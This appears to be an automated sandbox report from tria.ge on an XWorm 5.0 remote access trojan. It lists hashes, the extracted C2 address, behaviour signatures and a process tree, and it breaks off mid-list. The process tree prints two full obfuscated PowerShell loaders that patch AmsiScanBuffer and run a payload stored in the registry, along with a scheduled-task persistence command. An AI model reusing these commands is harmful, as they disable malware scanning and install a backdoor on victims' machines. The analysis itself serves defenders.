Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    09/03/2025, 14:55

General

  • Target

    XClient66.exe

  • Size

    501KB

  • MD5

    51e015f908d007651a56ba603c142b12

  • SHA1

    8fe6b8e61426c8a49a778de6f18ce568d58f2a9d

  • SHA256

    a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b

  • SHA512

    e598ed359d23173889046499c4093c739a80a044724aae16c4bb483311f0ad80357df7b7dd10f9a6cf12084a4009b18927adde3210ec6bebdf8dd57da997a9ad

  • SSDEEP

    12288:EItyU3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:RxkGTy

Malware Config

Extracted

Family

xworm

Version

5.0

C2

client-presence.gl.at.ply.gg:50976

Mutex

ZVJ9lOsEvNQZTKC6

Attributes
  • Install_directory

    %AppData%

  • install_file

    DeadM.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:600
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1036
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{cd6077db-8025-488a-9206-7204b9d8c119}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:956
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{24ba0dde-cacb-49eb-9f87-fa70b5fd2caa}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1952
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:680
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:404
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:456
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:436
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                  1⤵
                  • Indicator Removal: Clear Windows Event Logs
                  PID:1132
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1148
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1228
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1368
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3100
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:zFsDdXsdkorY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZZepLjIaCAGIJs,[Parameter(Position=1)][Type]$SqBbuYoQdS)$HlyNDJFSpwU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+','+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$HlyNDJFSpwU.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+'l'+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZZepLjIaCAGIJs).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$HlyNDJFSpwU.DefineMethod('In'+'v'+''+'o'+'k'+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+'t,'+'V'+'i'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+'',$SqBbuYoQdS,$ZZepLjIaCAGIJs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'aged');Write-Output $HlyNDJFSpwU.CreateType();}$okxveDAkKYboF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cro'+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+'W'+''+'i'+''+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+'a'+'t'+[Char](105)+'ve'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$GILvMXkGKCmdxt=$okxveDAkKYboF.GetMethod('G'+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+'o'+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+'St'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HdVAOxbKBNwDjzvxUnr=zFsDdXsdkorY @([String])([IntPtr]);$JJltUDyQmMvcCSmwzzWUQG=zFsDdXsdkorY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gDryElMXLPQ=$okxveDAkKYboF.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+[Char](100)+''+'u'+'l'+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+'.'+'d'+[Char](108)+''+'l'+'')));$zNGBiXtlejIdNz=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$gDryElMXLPQ,[Object](''+[Char](76)+''+'o'+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$JhtbZVWSPPoDKECir=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$gDryElMXLPQ,[Object](''+[Char](86)+'irt'+[Char](117)+''+'a'+'l'+'P'+'ro'+[Char](116)+''+'e'+'c'+'t'+'')));$oIvAZfg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zNGBiXtlejIdNz,$HdVAOxbKBNwDjzvxUnr).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$ZGxbfufdEOwdgyeva=$GILvMXkGKCmdxt.Invoke($Null,@([Object]$oIvAZfg,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+'f'+'e'+[Char](114)+'')));$twdYNAkeEV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhtbZVWSPPoDKECir,$JJltUDyQmMvcCSmwzzWUQG).Invoke($ZGxbfufdEOwdgyeva,[uint32]8,4,[ref]$twdYNAkeEV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZGxbfufdEOwdgyeva,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhtbZVWSPPoDKECir,$JJltUDyQmMvcCSmwzzWUQG).Invoke($ZGxbfufdEOwdgyeva,[uint32]8,0x20,[ref]$twdYNAkeEV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+'W'+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+''+'s'+''+[Char](116)+'ag'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3864
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:SOkfHXgNMGXw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FQgJIWNnXnxSyd,[Parameter(Position=1)][Type]$RJXijzqrnL)$ICQlLHLDErY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'eg'+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'ass'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+',Se'+[Char](97)+''+[Char](108)+'e'+[Char](100)+''+','+'Ans'+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'u'+[Char](116)+'o'+'C'+'l'+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$ICQlLHLDErY.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+'e'+'c'+'ia'+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+'B'+[Char](121)+'S'+[Char](105)+'g'+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$FQgJIWNnXnxSyd).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+'d'+'');$ICQlLHLDErY.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RJXijzqrnL,$FQgJIWNnXnxSyd).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ICQlLHLDErY.CreateType();}$PRsVQvpyTWrsZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+'sof'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'32.'+[Char](85)+'n'+'s'+''+[Char](97)+'feN'+[Char](97)+'t'+[Char](105)+'veMe'+[Char](116)+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$ECtJKKZrUwSRxr=$PRsVQvpyTWrsZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'cA'+'d'+'dr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$apuHrPYWFzREzWUcWtt=SOkfHXgNMGXw @([String])([IntPtr]);$juzLDvKVwJHVrUvlWSWVkd=SOkfHXgNMGXw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MaPWsWaBnbB=$PRsVQvpyTWrsZ.GetMethod('Get'+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$WvwLaSVBfwgOqd=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$MaPWsWaBnbB,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+'L'+'i'+'b'+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$TWgfIbgSNqXMGgAas=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$MaPWsWaBnbB,[Object](''+[Char](86)+''+'i'+'rt'+'u'+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$FwFNluc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WvwLaSVBfwgOqd,$apuHrPYWFzREzWUcWtt).Invoke(''+[Char](97)+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$wGrLUHMcKsyPFEQQj=$ECtJKKZrUwSRxr.Invoke($Null,@([Object]$FwFNluc,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+'c'+'a'+'n'+[Char](66)+''+'u'+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$jiCPHvybXD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWgfIbgSNqXMGgAas,$juzLDvKVwJHVrUvlWSWVkd).Invoke($wGrLUHMcKsyPFEQQj,[uint32]8,4,[ref]$jiCPHvybXD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wGrLUHMcKsyPFEQQj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TWgfIbgSNqXMGgAas,$juzLDvKVwJHVrUvlWSWVkd).Invoke($wGrLUHMcKsyPFEQQj,[uint32]8,0x20,[ref]$jiCPHvybXD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](68)+''+[Char](101)+''+'a'+''+[Char](100)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4760
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:3776
                          • C:\Users\Admin\AppData\Roaming\DeadM.exe
                            "C:\Users\Admin\AppData\Roaming\DeadM.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2424
                          • C:\Users\Admin\AppData\Roaming\DeadM.exe
                            "C:\Users\Admin\AppData\Roaming\DeadM.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:1736
                          • C:\Users\Admin\AppData\Roaming\DeadM.exe
                            "C:\Users\Admin\AppData\Roaming\DeadM.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2288
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1380
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1388
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1400
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1428
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1480
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1612
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                        • Modifies registry class
                                        PID:2864
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1648
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1716
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1768
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1828
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1864
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1968
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1976
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1988
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2036
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1312
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2168
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2308
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2348
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2456
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2620
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2628
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2900
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:2936
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                      • Enumerates connected drives
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2984
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:3004
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:3016
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:3024
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                            1⤵
                                                                              PID:3176
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3204
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3624
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3632
                                                                                  • C:\Users\Admin\AppData\Local\Temp\XClient66.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\XClient66.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3884
                                                                                    • C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
                                                                                      3⤵
                                                                                      • Checks computer location settings
                                                                                      • Drops startup file
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3396
                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadM" /tr "C:\Users\Admin\AppData\Roaming\DeadM.exe"
                                                                                        4⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:4364
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          5⤵
                                                                                            PID:2148
                                                                                      • C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1764
                                                                                      • C:\Users\Admin\AppData\Local\Temp\DeadR.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:2108
                                                                                      • C:\Users\Admin\AppData\Local\Temp\DeadR.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1376
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3788
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4084
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4152
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4320
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:4680
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1000
                                                                                              • C:\Windows\system32\svchost.exe
